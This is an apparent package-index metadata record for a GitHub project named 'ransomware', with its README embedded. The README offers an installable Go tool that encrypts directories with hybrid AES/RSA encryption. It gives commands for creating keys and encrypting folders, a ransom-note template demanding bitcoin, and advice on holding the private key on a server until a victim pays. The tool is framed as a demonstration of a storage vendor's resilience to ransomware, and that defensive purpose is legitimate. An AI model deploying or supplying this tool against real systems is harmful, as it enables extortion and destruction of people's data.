{"id":17688816,"url":"https://github.com/marmos91/ransomware","last_synced_at":"2025-10-12T08:07:34.903Z","repository":{"id":61628577,"uuid":"550146849","full_name":"marmos91/ransomware","owner":"marmos91","description":"A simple demonstration tool to simulate a ransomware attack","archived":false,"fork":false,"pushed_at":"2023-07-06T11:06:35.000Z","size":44,"stargazers_count":39,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-10-12T08:07:33.752Z","etag":null,"topics":["decryption","encryption","ransomware","rsa"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/marmos91.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-10-12T09:23:46.000Z","updated_at":"2025-09-29T15:48:25.000Z","dependencies_parsed_at":"2024-06-20T16:33:59.892Z","dependency_job_id":"7fcf1a1e-b7fd-455c-b87d-c39ad4058941","html_url":"https://github.com/marmos91/ransomware","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/marmos91/ransomware","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/manifests","owner_url":"https://repos.ecosyste.
ms/api/v1/hosts/GitHub/owners/marmos91","download_url":"https://codeload.github.com/marmos91/ransomware/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/marmos91%2Fransomware/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279010800,"owners_count":26084807,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-12T02:00:06.719Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["decryption","encryption","ransomware","rsa"],"created_at":"2024-10-24T11:45:37.326Z","updated_at":"2025-10-12T08:07:34.885Z","avatar_url":"https://github.com/marmos91.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ransomware-example\n\nA simple demonstration tool to simulate a ransomware attack locally\n\n## ⚠️ Disclaimer ⚠️\n\nThis software is made just for demonstration and study purposes.\nIf you want to run it locally for tests, take care of what directories you decide to encrypt. 
The software is distributed under the MIT license.\nIts use is free; however, the author doesn't take responsibility for any illegal use of the code by 3rd parties.\n\n## Setup\n\nTo set up the tool, just run\n\n```bash\ngo install github.com/marmos91/ransomware@latest\n```\n\n### Setup locally\n\nTo run the tool locally without installing it\n\n```bash\ngo run main.go\n```\n\n## Why\n\nIn order to demonstrate the way ransomware works quickly and in a protected environment, **it is very useful to be able to restrict its operation within a directory**.\nThis way the process takes much less time (the entire operating system does not need to be encrypted).\nWriting this tool in Go also **allows the tool to be developed even in a non-Windows environment** (Windows being by far the operating system most targeted by the ransomware available online).\n\n## Demo\n\nThis project was used to showcase the resilience of [Cubbit](https://www.cubbit.io)'s object storage to this type of attack, demonstrating how it is possible to defend against such a tool using Cubbit's features ([versioning](https://docs.cubbit.io/guides/bucket-and-object-versioning), [object locking](https://docs.cubbit.io/guides/object-lock)).\n\nThe whole thing is available in a video demo that can be found [here](https://www.youtube.com/watch?v=w4vfng17eYg).\n\n[![Watch the video](https://markdown-videos.vercel.app/youtube/w4vfng17eYg)](https://youtu.be/w4vfng17eYg)\n\nThe restore tool used in the demo is available [here](https://github.com/marmos91/s3restore).\n\n## How to use it\n\nThis tool is used to simulate a ransomware attack. With it you can perform the following actions:\n\n1. After setting up a key, recursively encrypt the contents of a specified path\n2. 
After asking for a key, recursively decrypt the contents of a specified path\n\n## Help\n\n```bash\nNAME:\n   ransomware - A simple demonstration tool to simulate a ransomware attack\n\nUSAGE:\n   ransomware [global options] command [command options] [arguments...]\n\nVERSION:\n   v1.0.0\n\nAUTHOR:\n   Marco Moschettini \u003cmarco.moschettini@cubbit.io\u003e\n\nCOMMANDS:\n   create-keys, c  Generates a new random keypair and saves it to a file\n   encrypt, e      Encrypts a directory\n   decrypt, d      Decrypts a directory\n   help, h         Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n   --verbose      Runs the tool in verbose mode (more logs) (default: false)\n   --help, -h     show help (default: false)\n   --version, -v  print the version (default: false)\n```\n\n## Create a keypair\n\nThe first thing you need to do is create a keypair. You can do it by running\n\n```bash\nransomware create-keys --path ~/Desktop\n```\n\nIf you don't specify a path, it will create the keys in `pwd`.\nThis command will create two files:\n\n- pub.pem\n- priv.pem\n\nIn a real scenario you need to put the `private key` on a server and provide it only after the victim has paid the ransom. 
The public key, instead, needs to be embedded in the ransomware to encrypt the folders.\n\n## Encrypt a directory\n\nWith this command you can recursively encrypt every file inside a specified directory.\n\n```bash\nNAME:\n   ransomware encrypt - Encrypts a directory\n\nUSAGE:\n   ransomware encrypt [command options] [arguments...]\n\nOPTIONS:\n   --path value, -p value      Runs the tool on a directory\n   --publicKey value           Loads the provided RSA public key in PEM format\n   --extBlacklist value        the extension to blacklist (default: \".enc\")\n   --extWhitelist value        the extension to whitelist\n   --skipHidden                skips hidden folders (default: false)\n   --dryRun                    encrypts files without deleting originals (default: false)\n   --encSuffix value           defines the suffix to add to encrypted files (default: \".enc\")\n   --addRansom                 if set to true add a ransom note to every encrypted folder (default: false)\n   --ransomTemplatePath value  defines where to find the template to use for the ransom note\n   --ransomFileName value      defines the name of the ransom file name (default: \"IMPORTANT.txt\")\n   --bitcoinCount value        how many bitcoins to ask as ransom (default: 0)\n   --bitcoinAddress value      the bitcoin address to use (default: \"\u003cbitcoin address\u003e\")\n   --help, -h                  show help (default: false)\n```\n\nFor example, if you want to run the tool on the `~/Documents` folder, run:\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Documents\n```\n\nThis command provides the following options:\n\n- `path`: the path to encrypt. This is required\n- `publicKey`: the path of the publicKey PEM file created by the `create-keys` command\n- `extBlacklist`: if provided, a comma-separated list of extensions to skip. 
**This feature is useful to exclude executables like `.exe` files**\n- `extWhitelist`: if provided, a comma-separated list of extensions to whitelist\n- `skipHidden`: if set, skips hidden folders\n- `dryRun`: just creates encrypted files without deleting originals\n- `encSuffix`: defines a custom extension to set on encrypted files (default `.enc`)\n- `addRansom`: whether the tool should generate a new ransom note file for each encrypted folder\n- `ransomTemplatePath`: the path of the template to use as ransom note\n- `ransomFileName`: the name to give to the ransom file\n- `bitcoinCount`: how many bitcoins to ask as ransom\n- `bitcoinAddress`: the bitcoin address to use inside the ransom file\n\n### Examples\n\nEncrypt only `.gif` files on the Desktop\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extWhitelist .gif\n```\n\nEncrypt everything except `.csv` and `.pdf` files\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --extBlacklist .csv,.pdf\n```\n\nEncrypt everything and add a ransom file\n\n```bash\nransomware encrypt --publicKey ./pub.pem --path ~/Desktop --addRansom --ransomTemplatePath ./ransom/IMPORTANT.txt\n```\n\n### Ransom file\n\nThis is an example of a ransom file. The templated strings `{{.BitcoinAddress}}`, `{{.BitcoinCount}}` and `{{.PublicKey}}` will be replaced by the tool. Please check the encrypt options above to see the values available.\n\n```txt\n!!! 
IMPORTANT !!!\n\nAll of your files are encrypted with RSA 4096 and AES 256 ciphers.\nMore information about RSA and AES can be found here:\n- https://en.wikipedia.org/wiki/RSA_(cryptosystem)\n- https://en.wikipedia.org/wiki/Advanced_Encryption_Standard\n\nDecrypting of your files is only possible with the private key and decrypt program, which is not available to you.\nTo receive your private key please send {{.BitcoinCount}}BTC to {{.BitcoinAddress}} together with the public key used to encrypt your files\n\nThe public key to use in the form is\n\n{{.PublicKey}}\n```\n\n## Decrypt a directory\n\nWith this command you can decrypt a folder back to its original form after a victim has paid the ransom.\n\n```bash\nNAME:\n   ransomware decrypt - Decrypts a directory\n\nUSAGE:\n   ransomware decrypt [command options] [arguments...]\n\nOPTIONS:\n   --path value, -c value  Runs the tool on a directory\n   --privateKey value      Loads the provided RSA private key in PEM format\n   --dryRun                decrypts files without deleting encrypted versions (default: false)\n   --encSuffix value       defines the suffix to add to encrypted files (default: \".enc\")\n   --ransomFileName value  defines the name of the ransom file name (default: \"IMPORTANT.txt\")\n   --help, -h              show help (default: false)\n```\n\nFor example, if you want to run the tool on the `~/Documents` folder, run:\n\n```bash\nransomware decrypt --privateKey ./priv.pem --path ~/Desktop/toEncrypt\n```\n\nThis command provides the following options:\n\n- `path`: the path to decrypt. This is required\n- `privateKey`: the path of the privateKey PEM file created by the `create-keys` command\n- `dryRun`: just creates decrypted files without deleting the encrypted versions\n- `encSuffix`: defines a custom extension for encrypted files (default `.enc`)\n- `ransomFileName`: defines the name of the ransom file. 
Needed to delete the files previously generated\n\n## How it works\n\nThe tool implements a [**hybrid encryption strategy**](\u003chttps://www.picussecurity.com/resource/the-most-common-ransomware-ttp-mitre-attck-t1486-data-encrypted-for-impact#:~:text=In%20the%20hybrid%20encryption%20approach,(public%20key)%20encryption%20algorithm.\u003e) making use of two different algorithms:\n\n- [AES256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard)\n- [RSA2048](\u003chttps://en.wikipedia.org/wiki/RSA_(cryptosystem)\u003e)\n\nThe reason for this choice is related to the different nature of the two encryption algorithms. **A hybrid approach takes advantage of the performance of AES to execute faster, while at the same time not providing the decryption key within the executable**.\n\nA new random AES key is then generated for the session each time the tool is executed. **This key is used to encrypt all files in the selected folder**. For later retrieval, this key is **encrypted with the public RSA key provided** to the tool and prepended to all encrypted files.\n\nIn this way, the tool, provided with the corresponding private key, will be able to **read the AES key at the beginning of each file, decrypt it, and finally use it to decrypt the file**.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarmos91%2Fransomware","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmarmos91%2Fransomware","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmarmos91%2Fransomware/lists"}